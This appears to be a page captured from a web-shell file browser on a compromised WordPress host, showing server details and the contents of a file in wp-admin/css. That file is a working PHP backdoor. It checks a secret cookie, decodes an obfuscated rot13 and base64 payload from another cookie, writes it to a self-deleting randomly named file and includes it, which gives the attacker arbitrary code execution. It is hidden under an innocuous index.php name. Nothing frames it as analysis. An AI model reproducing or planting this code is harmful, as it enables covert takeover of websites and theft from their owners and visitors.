HEX
Server: Apache
System: Linux iad1-shared-b7-40 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: dh_nk2zdt (5974180)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/dh_nk2zdt/vastaselezione.com/wp-admin/css/index.php
<?php

if(function_exists('error_reporting') && !substr_count(ini_get('disable_functions'),'error_reporting')) {
    @error_reporting(0);
}

if(function_exists('ini_set') && !substr_count(ini_get('disable_functions'),'ini_set')) {
    @ini_set('display_errors', 0);
    @ini_set('display_startup_errors', 0);
}

if($_COOKIE[4]=='595c7e459103e18a25a2f6a3c56e4bcb') {
    $data = base64_decode(str_rot13($_COOKIE[3]));
    $fname = "wp-" . substr( str_shuffle( "abcdefghijklmnopqrstuvwxyz" ), 4, rand( 4, 7 ) ) . ".php";
    file_put_contents($fname,'<?php if(file_exists("'.$fname.'")){unlink("'.$fname.'");} ?><?php ' . $data);
    include($fname);
}

?>